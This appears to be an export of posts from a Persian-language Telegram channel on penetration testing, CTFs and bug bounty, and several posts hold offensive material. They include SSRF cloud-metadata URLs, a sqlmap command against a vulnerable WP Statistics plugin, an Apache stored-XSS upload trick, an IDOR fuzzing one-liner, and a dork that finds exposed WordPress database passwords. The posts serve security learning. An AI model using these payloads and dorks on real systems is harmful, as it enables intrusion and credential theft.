دوستان تا جایی که کانال پاک بشه با ممکنه مدیر قبلی که کانال انتقال داده بود مدیریت کانال برسه دستشون حذف نشه ولی تا اون موقع اینجا فعالیت میکنیم و کانالی که ایجاد کردیم(@TryHackBoxOfficial) را هم نظم و ترتیبی را به ان میدهیم .
👍1🔥1
Parrot Security Edition
یک سیستم عامل خاص است که برای تست نفوذ و عملیات #RedTeam طراحی شده است. این شامل زرادخانه کاملی از ابزارهای آماده برای استفاده است .
https://www.parrotsec.io/
#OS #linux #pentesting #parrot
@TryHackBox
یک سیستم عامل خاص است که برای تست نفوذ و عملیات #RedTeam طراحی شده است. این شامل زرادخانه کاملی از ابزارهای آماده برای استفاده است .
https://www.parrotsec.io/
#OS #linux #pentesting #parrot
@TryHackBox
🔥1
رزومه بیل گیتس در سال 1974. او در این زمان تنها 18 سال داشت و دانش او بسیار چشمگیر است.
#بیل_گیتس
@PfkSecurity
#بیل_گیتس
@PfkSecurity
👍7🔥2
💠 تفاوت بین CTF و آسیب پذیری های دنیای واقعی
معرفی
امنیت سایبری به یک جنبه حیاتی جامعه مدرن تبدیل شده است. با افزایش اتکا به فناوری، شرکت ها و سازمان ها به طور مداوم به دنبال راه هایی برای بهبود اقدامات امنیتی خود هستند. دو تا از محبوبترین راهها برای آزمایش و بهبود امنیت، از طریق رویدادهای Capture the Flag (CTF) و آسیبپذیریهای دنیای واقعی هستند. هر دوی این روشها برای شناسایی آسیبپذیریها در سیستمها طراحی شدهاند، اما از جهات مختلفی متفاوت هستند. در این پست، تفاوتهای بین CTF و آسیبپذیریهای دنیای واقعی را بررسی خواهیم کرد.
#CTF
@TryHackBox
@TryHackBoxOfficial
معرفی
امنیت سایبری به یک جنبه حیاتی جامعه مدرن تبدیل شده است. با افزایش اتکا به فناوری، شرکت ها و سازمان ها به طور مداوم به دنبال راه هایی برای بهبود اقدامات امنیتی خود هستند. دو تا از محبوبترین راهها برای آزمایش و بهبود امنیت، از طریق رویدادهای Capture the Flag (CTF) و آسیبپذیریهای دنیای واقعی هستند. هر دوی این روشها برای شناسایی آسیبپذیریها در سیستمها طراحی شدهاند، اما از جهات مختلفی متفاوت هستند. در این پست، تفاوتهای بین CTF و آسیبپذیریهای دنیای واقعی را بررسی خواهیم کرد.
#CTF
@TryHackBox
@TryHackBoxOfficial
👍2🔥2
Try Hack Box
💠 تفاوت بین CTF و آسیب پذیری های دنیای واقعی معرفی امنیت سایبری به یک جنبه حیاتی جامعه مدرن تبدیل شده است. با افزایش اتکا به فناوری، شرکت ها و سازمان ها به طور مداوم به دنبال راه هایی برای بهبود اقدامات امنیتی خود هستند. دو تا از محبوبترین راهها برای آزمایش…
رویدادهای CTF
رویدادهای Capture the Flag (CTF) مسابقاتی هستند که در آن شرکت کنندگان تلاش می کنند از آسیب پذیری ها در یک محیط شبیه سازی شده سوء استفاده کنند. این رویدادها اغلب برای آموزش متخصصان امنیت سایبری و بهبود مهارت های آنها استفاده می شود. رویدادهای CTF را می توان در قالب های مختلفی از جمله مسابقات آنلاین و در محل انجام داد.
رویدادهای CTF سناریوهای دنیای واقعی را شبیهسازی میکنند و یک محیط کنترلشده برای شرکتکنندگان برای آزمایش مهارتهای خود ارائه میدهند. معمولاً به شرکتکنندگان مجموعهای از چالشها داده میشود که هر کدام آسیبپذیری خاصی برای اکسپلویت دارند. چلنچ ها می تواند شامل کارهایی مانند مهندسی معکوس، رمزنگاری و web exploitation باشد.
آسیب پذیری های دنیای واقعی
آسیب پذیری های دنیای واقعی به ضعف های امنیتی که در سیستم های زنده وجود دارد اشاره دارد. این آسیب پذیری ها می توانند توسط مهاجمان برای دسترسی غیرمجاز به داده ها یا سیستم ها مورد سوء استفاده قرار گیرند. آسیبپذیریهای دنیای واقعی میتواند ناشی از عوامل مختلفی از جمله اشکالات نرمافزاری، خطای انسانی و misconfigured system باشد.
آسیبپذیریهای دنیای واقعی را میتوان از طریق روشهای مختلف، مانند تست نفوذ، اسکن آسیبپذیری، و برنامههای باگ بانتی کشف کرد. این روشها برای شناسایی آسیبپذیریها در سیستمهای زنده و ارائه توصیههایی برای اصلاح طراحی شدهاند.
#CTF
@TryHackBox
@TryHackBoxOfficial
رویدادهای Capture the Flag (CTF) مسابقاتی هستند که در آن شرکت کنندگان تلاش می کنند از آسیب پذیری ها در یک محیط شبیه سازی شده سوء استفاده کنند. این رویدادها اغلب برای آموزش متخصصان امنیت سایبری و بهبود مهارت های آنها استفاده می شود. رویدادهای CTF را می توان در قالب های مختلفی از جمله مسابقات آنلاین و در محل انجام داد.
رویدادهای CTF سناریوهای دنیای واقعی را شبیهسازی میکنند و یک محیط کنترلشده برای شرکتکنندگان برای آزمایش مهارتهای خود ارائه میدهند. معمولاً به شرکتکنندگان مجموعهای از چالشها داده میشود که هر کدام آسیبپذیری خاصی برای اکسپلویت دارند. چلنچ ها می تواند شامل کارهایی مانند مهندسی معکوس، رمزنگاری و web exploitation باشد.
آسیب پذیری های دنیای واقعی
آسیب پذیری های دنیای واقعی به ضعف های امنیتی که در سیستم های زنده وجود دارد اشاره دارد. این آسیب پذیری ها می توانند توسط مهاجمان برای دسترسی غیرمجاز به داده ها یا سیستم ها مورد سوء استفاده قرار گیرند. آسیبپذیریهای دنیای واقعی میتواند ناشی از عوامل مختلفی از جمله اشکالات نرمافزاری، خطای انسانی و misconfigured system باشد.
آسیبپذیریهای دنیای واقعی را میتوان از طریق روشهای مختلف، مانند تست نفوذ، اسکن آسیبپذیری، و برنامههای باگ بانتی کشف کرد. این روشها برای شناسایی آسیبپذیریها در سیستمهای زنده و ارائه توصیههایی برای اصلاح طراحی شدهاند.
#CTF
@TryHackBox
@TryHackBoxOfficial
Try Hack Box
رویدادهای CTF رویدادهای Capture the Flag (CTF) مسابقاتی هستند که در آن شرکت کنندگان تلاش می کنند از آسیب پذیری ها در یک محیط شبیه سازی شده سوء استفاده کنند. این رویدادها اغلب برای آموزش متخصصان امنیت سایبری و بهبود مهارت های آنها استفاده می شود. رویدادهای…
تفاوت بین آسیب پذیری های CTF و دنیای واقعی
هدف :
هدف اصلی رویدادهای CTF بهبود مهارت های متخصصان امنیت سایبری با ارائه یک محیط کنترل شده برای آزمایش توانایی های آنها است. از سوی دیگر، آسیبپذیریهای دنیای واقعی در سیستمهای زنده کشف میشوند و اغلب توسط مهاجمانی که تلاش میکنند از آنها سوءاستفاده کنند، کشف میشوند.
Environment :
رویدادهای CTF در یک محیط شبیهسازی شده اتفاق میافتد که در آن شرکتکنندگان مجموعهای از چلنچ ها را تکمیل میکنند. آسیبپذیریهای دنیای واقعی در سیستمهای زنده کشف میشوند، جایی که مهاجمان تلاش میکنند از آسیبپذیریها برای دسترسی غیرمجاز به دادهها یا سیستمها سوءاستفاده یا همون اکسپلویت کنند.
Scope :
رویدادهای CTF اغلب بر حوزه های خاصی از امنیت سایبری، مانند web exploitation یا مهندسی معکوس متمرکز می شوند. از سوی دیگر، آسیبپذیریهای دنیای واقعی میتوانند در هر جنبهای از زیرساخت فناوری یک سازمان رخ دهند.
عواقب :
اکسپلویتینگ(exploiting) از آسیب پذیری ها در یک رویداد CTF هیچ عواقبی در دنیای واقعی ندارد، زیرا در یک محیط شبیه سازی شده اتفاق می افتد. با این حال، آسیبپذیریهای دنیای واقعی میتوانند پیامدهای مهمی از جمله نقض دادهها، زیان مالی و آسیب به شهرت داشته باشند.
Complexity :
رویدادهای CTF اغلب سناریوهای پیچیده ای را شبیه سازی می کنند که شرکت کنندگان را ملزم می کند خلاقانه و خارج از چارچوب فکر کنند. آسیبپذیریهای دنیای واقعی میتوانند به همان اندازه پیچیده باشند، اما اغلب متغیرها و مجهولات بیشتری را شامل میشوند و شناسایی و اصلاح آنها را چالشبرانگیزتر میکند.
بازه زمانی :
رویدادهای CTF معمولاً محدود به زمان هستند و شرکتکنندگان زمان مشخصی برای تکمیل چلنچ ها دارند. از سوی دیگر، آسیبپذیریهای دنیای واقعی میتوانند برای مدتهای طولانی قبل از کشف و اصلاح وجود داشته باشند.
همکاری :
رویدادهای CTF اغلب همکاری بین شرکتکنندگان را تشویق میکند، با تیمهایی که برای حل چالشها با هم کار میکنند. آسیبپذیریهای دنیای واقعی اغلب توسط محققان یا مهاجمان منفرد کشف میشوند، که ممکن است به منابع و فرصتهای همکاری مشابه شرکتکنندگان در یک رویداد CTF دسترسی نداشته باشند.
#CTF
@TryHackBox
@TryHackBoxOfficial
هدف :
هدف اصلی رویدادهای CTF بهبود مهارت های متخصصان امنیت سایبری با ارائه یک محیط کنترل شده برای آزمایش توانایی های آنها است. از سوی دیگر، آسیبپذیریهای دنیای واقعی در سیستمهای زنده کشف میشوند و اغلب توسط مهاجمانی که تلاش میکنند از آنها سوءاستفاده کنند، کشف میشوند.
Environment :
رویدادهای CTF در یک محیط شبیهسازی شده اتفاق میافتد که در آن شرکتکنندگان مجموعهای از چلنچ ها را تکمیل میکنند. آسیبپذیریهای دنیای واقعی در سیستمهای زنده کشف میشوند، جایی که مهاجمان تلاش میکنند از آسیبپذیریها برای دسترسی غیرمجاز به دادهها یا سیستمها سوءاستفاده یا همون اکسپلویت کنند.
Scope :
رویدادهای CTF اغلب بر حوزه های خاصی از امنیت سایبری، مانند web exploitation یا مهندسی معکوس متمرکز می شوند. از سوی دیگر، آسیبپذیریهای دنیای واقعی میتوانند در هر جنبهای از زیرساخت فناوری یک سازمان رخ دهند.
عواقب :
اکسپلویتینگ(exploiting) از آسیب پذیری ها در یک رویداد CTF هیچ عواقبی در دنیای واقعی ندارد، زیرا در یک محیط شبیه سازی شده اتفاق می افتد. با این حال، آسیبپذیریهای دنیای واقعی میتوانند پیامدهای مهمی از جمله نقض دادهها، زیان مالی و آسیب به شهرت داشته باشند.
Complexity :
رویدادهای CTF اغلب سناریوهای پیچیده ای را شبیه سازی می کنند که شرکت کنندگان را ملزم می کند خلاقانه و خارج از چارچوب فکر کنند. آسیبپذیریهای دنیای واقعی میتوانند به همان اندازه پیچیده باشند، اما اغلب متغیرها و مجهولات بیشتری را شامل میشوند و شناسایی و اصلاح آنها را چالشبرانگیزتر میکند.
بازه زمانی :
رویدادهای CTF معمولاً محدود به زمان هستند و شرکتکنندگان زمان مشخصی برای تکمیل چلنچ ها دارند. از سوی دیگر، آسیبپذیریهای دنیای واقعی میتوانند برای مدتهای طولانی قبل از کشف و اصلاح وجود داشته باشند.
همکاری :
رویدادهای CTF اغلب همکاری بین شرکتکنندگان را تشویق میکند، با تیمهایی که برای حل چالشها با هم کار میکنند. آسیبپذیریهای دنیای واقعی اغلب توسط محققان یا مهاجمان منفرد کشف میشوند، که ممکن است به منابع و فرصتهای همکاری مشابه شرکتکنندگان در یک رویداد CTF دسترسی نداشته باشند.
#CTF
@TryHackBox
@TryHackBoxOfficial
👍2
Try Hack Box
تفاوت بین آسیب پذیری های CTF و دنیای واقعی هدف : هدف اصلی رویدادهای CTF بهبود مهارت های متخصصان امنیت سایبری با ارائه یک محیط کنترل شده برای آزمایش توانایی های آنها است. از سوی دیگر، آسیبپذیریهای دنیای واقعی در سیستمهای زنده کشف میشوند و اغلب توسط مهاجمانی…
نتیجه
ا Capture the Flag و آسیبپذیریهای دنیای واقعی هر دو راههای مهمی برای آزمایش و بهبود اقدامات امنیت سایبری هستند. در حالی که رویدادهای CTF یک محیط کنترلشده را برای شرکتکنندگان فراهم میکند تا مهارتهای خود را آزمایش کنند، آسیبپذیریهای دنیای واقعی بینشی از آسیبپذیریهای موجود در سیستمهای زنده ارائه میدهند. درک تفاوت های بین این دو روش برای سازمان هایی که به دنبال بهبود وضعیت امنیتی خود و محافظت از دارایی های خود در برابر تهدیدات سایبری هستند بسیار مهم است. با استفاده از رویدادهای CTF و آزمایش آسیبپذیری در دنیای واقعی، سازمانها میتوانند جلوتر از امنیت سایبری در حال تکامل باشند.
#CTF
@TryHackBox
@TryHackBoxOfficial
ا Capture the Flag و آسیبپذیریهای دنیای واقعی هر دو راههای مهمی برای آزمایش و بهبود اقدامات امنیت سایبری هستند. در حالی که رویدادهای CTF یک محیط کنترلشده را برای شرکتکنندگان فراهم میکند تا مهارتهای خود را آزمایش کنند، آسیبپذیریهای دنیای واقعی بینشی از آسیبپذیریهای موجود در سیستمهای زنده ارائه میدهند. درک تفاوت های بین این دو روش برای سازمان هایی که به دنبال بهبود وضعیت امنیتی خود و محافظت از دارایی های خود در برابر تهدیدات سایبری هستند بسیار مهم است. با استفاده از رویدادهای CTF و آزمایش آسیبپذیری در دنیای واقعی، سازمانها میتوانند جلوتر از امنیت سایبری در حال تکامل باشند.
#CTF
@TryHackBox
@TryHackBoxOfficial
👍4
☁️ آدرس منابع ابری برای دسترسی از طریق SSRF
هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.
و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.
Oracle Cloud:
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
Alibaba :
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
Digital Ocean :
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.
و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.
Oracle Cloud:
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
Alibaba :
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
Digital Ocean :
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
🔥3
🏃♂️ تبدیل خروجی ساده به هش برای جستجوی IDOR
گاهی اوقات لازم است ورودی را مستقیماً در کنسول به md5 / base64 / 32 و غیره تبدیل کنید. این می تواند مفید باشد به خصوص زمانی که به دنبال IDOR هستید و نقطه پایانی دارای مقدار هش است، مانند این:
برای حل این مشکل می توانید از یک اسکریپت bash ساده همراه با ffuf استفاده کنید.
فرض کنید یک نقطه پایانی دارید که پارامتر id را به شکل md5 می پذیرد. ما می توانیم آن را برای IDOR با استفاده از دستور زیر آزمایش کنیم که لیستی از اعداد 1 تا 1000 را ایجاد می کند:
#Web #IDOR #Bash
@TryHackBox
@TryHackBoxOfficial
گاهی اوقات لازم است ورودی را مستقیماً در کنسول به md5 / base64 / 32 و غیره تبدیل کنید. این می تواند مفید باشد به خصوص زمانی که به دنبال IDOR هستید و نقطه پایانی دارای مقدار هش است، مانند این:
https://targetdomain.com/user/3bf1114a986ba87ed28fc1b5884fc2f8برای حل این مشکل می توانید از یک اسکریپت bash ساده همراه با ffuf استفاده کنید.
فرض کنید یک نقطه پایانی دارید که پارامتر id را به شکل md5 می پذیرد. ما می توانیم آن را برای IDOR با استفاده از دستور زیر آزمایش کنیم که لیستی از اعداد 1 تا 1000 را ایجاد می کند:
seq 1 1000 | hashit md5 | ffuf -w - -u https://targetdomain.com/user/FUZZ
#Web #IDOR #Bash
@TryHackBox
@TryHackBoxOfficial
🔥3👍1
جستجوی پارامترهای پنهان را خودکار کنید
این واقعا می تواند به شما کمک کند آسیب پذیری های جدید را پیدا کنید، زیرا برخی از نفوذگران و توسعه دهندگان فراموش می کنند که آنها را بررسی کنند.
در مورد ابزارهای کنسول برای یافتن پارامترهای پنهان،من دوست دارم از arjun و x8 استفاده کنم.
برای اتوماسیون،لیست URL ها را در فایل
Arjun :
X8:
در نتیجه،لیستی از URL ها به همراه پارامترهای پنهان دریافت می کنیم:
فراموش نکنید که برای نتایج بهتر می توانید از لیست های خود با پارامترها استفاده کنید. آنها را می توان با استفاده از پرچم
• samlists
• arjun
• Param Miner
Github :
X8
Arjun
#Web #Recon
@TryHackBox
@TryHackBoxOfficial
این واقعا می تواند به شما کمک کند آسیب پذیری های جدید را پیدا کنید، زیرا برخی از نفوذگران و توسعه دهندگان فراموش می کنند که آنها را بررسی کنند.
در مورد ابزارهای کنسول برای یافتن پارامترهای پنهان،من دوست دارم از arjun و x8 استفاده کنم.
برای اتوماسیون،لیست URL ها را در فایل
web.list ذخیره می کنیم:https://example.com
https://example.com/download
[…]
Arjun :
cat web.list | xargs -I% bash -c "arjun -u % -oT arjun.urls && cat arjun.urls >> arjun.list"X8:
cat web.list | xargs -I% bash -c "x8 -u % -o x8.urls -O url && cat x8.urls >> x8.list"در نتیجه،لیستی از URL ها به همراه پارامترهای پنهان دریافت می کنیم:
https://example.com?p=1&id=2
https://example.com/download?u=123
[…]فراموش نکنید که برای نتایج بهتر می توانید از لیست های خود با پارامترها استفاده کنید. آنها را می توان با استفاده از پرچم
-w مشخص کرد. در اینجا به برخی از آنها اشاره می کنیم:• samlists
• arjun
• Param Miner
Github :
X8
Arjun
#Web #Recon
@TryHackBox
@TryHackBoxOfficial
👍1
🗳 نحوه دریافت XSS ذخیره شده هنگام آپلود فایل در آپاچی
Apache httpd به طور خودکار
Apache httpd به طور پیشفرض از
از آنجایی که "
فروشنده می گوید که این رفتار مورد انتظار برای
#Web #XSS #Apache
@TryHackBox
@TryHackBoxOfficial
Apache httpd به طور خودکار
Content-type برای فایلهای بدون نام (اما با پسوند) و برای فایلهایی که فقط حاوی نقطه به عنوان نام هستند، بر نمیگرداند. به عنوان مثال، test.jpg Content-Type: image/jpeg را برمی گرداند، اما ...jpg نمی دهد.Apache httpd به طور پیشفرض از
mod_mime استفاده میکند، و رفتار پیشفرض mod_mime این است که نوع محتوا را برای فایلهایی که نامشان از نقطهها و یک پسوند تشکیل شده است، مانند " ...jpg " تنظیم نمیکند.از آنجایی که "
...jpg " نیز چک بی اهمیت "ends with .jpg" را پاس می کند، می توانیم از آن در فرم های آپلود تصویر استفاده کنیم. کد HTML مخرب را می توان در فایلی با نام " ...jpg " بارگذاری کرد، که سپس بدون نوع محتوا برگردانده می شود. اگر Content-Type Sniffing صراحتاً غیرفعال نباشد (و به طور پیشفرض نیست)، ما را به XSS ذخیرهشده سوق میدهد.فروشنده می گوید که این رفتار مورد انتظار برای
mod_mime است ...#Web #XSS #Apache
@TryHackBox
@TryHackBoxOfficial
👍2
🖇 هنگام کار بر روی وردپرس از چه چیزهایی باید اجتناب کرد
1.- تنظیمات را به عنوان پیش فرض بگذارید.
2. اجازه عدم کنترل بر محتوا و پالیسی های عمومی را بدهید.
صفحه زیر این موضوع را تایید می کند. با استفاده از Google Dork میتوانید میزبانهای مشابهی پیدا کنید:
@TryHackBox
@TryHackBoxOfficial
1.- تنظیمات را به عنوان پیش فرض بگذارید.
2. اجازه عدم کنترل بر محتوا و پالیسی های عمومی را بدهید.
صفحه زیر این موضوع را تایید می کند. با استفاده از Google Dork میتوانید میزبانهای مشابهی پیدا کنید:
"define('DB_USER'," "define('DB_PASSWORD'," ext:txt
#Google #WordPress@TryHackBox
@TryHackBoxOfficial
🔎 ابزارهای مختلف جستجو
تقریباً همه شما در مورد Google Dorks شنیده اید، اما dorks برای Yandex، DuckDuckGo، Bing، VirusTotal، Github، Shodan و غیره بسیار کمتر شناخته شده است.
در اینجا مجموعه کوچکی از ابزارهای کاربردی و پیوندهایی به لیست های dork برای ابزارهای مختلف جستجو وجود دارد.
Google, Bing, Ecosia, Yahoo или Yandex
https://github.com/Zarcolio/sitedorks
Google Dorks:
https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List
DuckDuckGo dorks
https://github.com/d34dfr4m3/goDuck
Github Dorks:
https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
Shodan Dorks:
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
Virus Total Dorks:
https://github.com/Neo23x0/vti-dorks
Binary Edge + Shodan + Google:
https://github.com/iGotRootSRC/Dorkers
#Web #Recon #Dork
@TryHackBox
@TryHackBoxOfficial
تقریباً همه شما در مورد Google Dorks شنیده اید، اما dorks برای Yandex، DuckDuckGo، Bing، VirusTotal، Github، Shodan و غیره بسیار کمتر شناخته شده است.
در اینجا مجموعه کوچکی از ابزارهای کاربردی و پیوندهایی به لیست های dork برای ابزارهای مختلف جستجو وجود دارد.
Google, Bing, Ecosia, Yahoo или Yandex
https://github.com/Zarcolio/sitedorks
Google Dorks:
https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List
DuckDuckGo dorks
https://github.com/d34dfr4m3/goDuck
Github Dorks:
https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
Shodan Dorks:
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
Virus Total Dorks:
https://github.com/Neo23x0/vti-dorks
Binary Edge + Shodan + Google:
https://github.com/iGotRootSRC/Dorkers
#Web #Recon #Dork
@TryHackBox
@TryHackBoxOfficial
GitHub
GitHub - Zarcolio/sitedorks: Search Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites…
Search Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. - Zarcolio/sitedorks
🔥2👎1
🏠 سرقت TLS در جستجوی نقاط پایانی جدید
ProjectDiscovery TLS خود را به نام tlsx منتشر کرد. برای توضیح کامل، لینک GitHub را ببینید، اما من برخی از ویژگی های راحت را برجسته می کنم.
اولین مورد، امکان مشاهده سریع نام سازمان در گواهی است. ما CIDRهایی را که ممکن است متعلق به تارگت ما باشد جمع آوری می کنیم و دستوری مانند:
دومین ویژگی جالب، جمع آوری subdomain ها از CN و SAN و ترکیب tlsx با dnsx برای جمع آوری غیرفعال زیر دامنه ها و سپس با httpx برای جستجوی سرویس وب زنده است:
#web #Recon
@TryHackBox
@TryHackBoxOfficial
ProjectDiscovery TLS خود را به نام tlsx منتشر کرد. برای توضیح کامل، لینک GitHub را ببینید، اما من برخی از ویژگی های راحت را برجسته می کنم.
اولین مورد، امکان مشاهده سریع نام سازمان در گواهی است. ما CIDRهایی را که ممکن است متعلق به تارگت ما باشد جمع آوری می کنیم و دستوری مانند:
echo 173.0.84.0/24 | tlsx -soدومین ویژگی جالب، جمع آوری subdomain ها از CN و SAN و ترکیب tlsx با dnsx برای جمع آوری غیرفعال زیر دامنه ها و سپس با httpx برای جستجوی سرویس وب زنده است:
echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only | dnsx -silent | httpx#web #Recon
@TryHackBox
@TryHackBoxOfficial
👍2
Try Hack Box pinned «دوستان از کانال حمایت کنید https://news.1rj.ru/str/TryHackBox?boost»
💉 بیش از 600000 سایت وردپرس در برابر تزریق SQL آسیب پذیر هستند.
WP Statistics
https://wordpress.org/plugins/wp-statistics/
یک افزونه وردپرس است که به صاحبان سایت اجازه می دهد تا آمار دقیق بازدیدکنندگان سایت خود را مشاهده کنند، از جمله صفحاتی که در سایت بازدید می کنند.
فراموش نکنید که بلافاصله افزونه را به روز کنید. سایت هایی که این افزونه را با نسخه <13.0.8 نصب کرده اند، در برابر تزریق SQL مبتنی بر زمان بدون احراز هویت آسیب پذیر هستند، که به مهاجمان اجازه می دهد به داده های حساس ذخیره شده در پایگاه داده سایت دسترسی پیدا کنند.
ما یک درخواست به
#Web #SQLi
@TryHackBox
@TryHackBoxOfficial
WP Statistics
https://wordpress.org/plugins/wp-statistics/
یک افزونه وردپرس است که به صاحبان سایت اجازه می دهد تا آمار دقیق بازدیدکنندگان سایت خود را مشاهده کنند، از جمله صفحاتی که در سایت بازدید می کنند.
فراموش نکنید که بلافاصله افزونه را به روز کنید. سایت هایی که این افزونه را با نسخه <13.0.8 نصب کرده اند، در برابر تزریق SQL مبتنی بر زمان بدون احراز هویت آسیب پذیر هستند، که به مهاجمان اجازه می دهد به داده های حساس ذخیره شده در پایگاه داده سایت دسترسی پیدا کنند.
ما یک درخواست به
wp-admin/admin.php با پارامتر page=wps_pages_page ارسال می کنیم. سپس باید مقادیر مخرب برای ID یا پارامترهای type تهیه کنید (این کار را می توان از طریق sqlmap انجام داد)sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --technique=T --dbms="mysql" -p "ID" -b
#Web #SQLi
@TryHackBox
@TryHackBoxOfficial
WordPress.org
WP Statistics – Simple, privacy-friendly Google Analytics alternative
Get website traffic insights with GDPR/CCPA compliant, privacy-friendly analytics. Includes visitor data, stunning graphs, and no data sharing.
❌ خطاهای کنترل دسترسی در وردپرس
کنترل دسترسی نامناسب می تواند بسیار خطرناک باشد (P2)، که به مهاجم اجازه می دهد با انتخاب فرمت مورد نظر، اطلاعات حساس را بخواند، به عنوان مثال: (xml، txt، json ...)
این نقاط پایانی را به لیست پیمایش دایرکتوری خود اضافه کنید:
@TryHackBox
@TryHackBoxOfficial
کنترل دسترسی نامناسب می تواند بسیار خطرناک باشد (P2)، که به مهاجم اجازه می دهد با انتخاب فرمت مورد نظر، اطلاعات حساس را بخواند، به عنوان مثال: (xml، txt، json ...)
این نقاط پایانی را به لیست پیمایش دایرکتوری خود اضافه کنید:
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=txt
#Web #WordPress@TryHackBox
@TryHackBoxOfficial
@tryhackbox CTF برای تازه کارهاpdf.pdf
805 KB
CTF برای تازه کارها CTF:
یک مسابقه امنیت سایبری محبوب است که شرکت کنندگان را برای حل یک سری معماها و چالش ها به منظور کشف کد یا رمز عبور مخفی به نام پرچم یا فلگ به چالش می کشد. این مسابقات برای آزمایش دانش و مهارت های شرکت کنندگان در زمینه های مختلف از جمله رمزنگاری، امنیت برنامه های کاربردی وب، امنیت شبکه و موارد دیگر طراحی شده است. اگر علاقه مند به شروع کار با CTF هستید اما نمی دانید از کجا شروع کنید، این pdf نکات و منابعی را در اختیار شما قرار می دهد تا به شما در شروع کار کمک کند...
@TryHackBox
@TryHackBoxOfficial
👍1
👨💻 تست نفوذ از مبتدی تا متخصص.
• من یک مخزن جالب را به اشتراک می گذارم که حاوی لینک هایی به مطالب ویدیویی مفید برای مطالعه موضوع امروز است:
• فاز 1 - تاریخچه.
• فاز 2 - فناوری وب و سرور.
• فاز 3 – راه اندازی آزمایشگاه با BurpSuite و bWAPP.
• فاز 4 - نقشه برداری از برنامه و سطح حمله.
• فاز 5 – درک و بهره برداری از 10 آسیب پذیری برتر OWASP.
• فاز 6 - تست مدیریت session.
• فاز 7 - بایپس کنترل های client-side .
• فاز 8 - حمله به احراز هویت/ورود.
• فاز 9 - حمله به کنترل های دسترسی (IDOR، Priv esc، فایل ها و دایرکتوری های مخفی).
• فاز 10 - اعتبارسنجی ورودی حمله (همه تزریقها، XSS و میکروفونها).
• فاز 11 – تولید و تست کدهای خطا.
• فاز 12 - تست رمزنگاری ضعیف.
• فاز 13 - آسیب پذیری منطق تجاری.
@TryHackBox
@TryHackBoxOfficial
• من یک مخزن جالب را به اشتراک می گذارم که حاوی لینک هایی به مطالب ویدیویی مفید برای مطالعه موضوع امروز است:
• فاز 1 - تاریخچه.
• فاز 2 - فناوری وب و سرور.
• فاز 3 – راه اندازی آزمایشگاه با BurpSuite و bWAPP.
• فاز 4 - نقشه برداری از برنامه و سطح حمله.
• فاز 5 – درک و بهره برداری از 10 آسیب پذیری برتر OWASP.
• فاز 6 - تست مدیریت session.
• فاز 7 - بایپس کنترل های client-side .
• فاز 8 - حمله به احراز هویت/ورود.
• فاز 9 - حمله به کنترل های دسترسی (IDOR، Priv esc، فایل ها و دایرکتوری های مخفی).
• فاز 10 - اعتبارسنجی ورودی حمله (همه تزریقها، XSS و میکروفونها).
• فاز 11 – تولید و تست کدهای خطا.
• فاز 12 - تست رمزنگاری ضعیف.
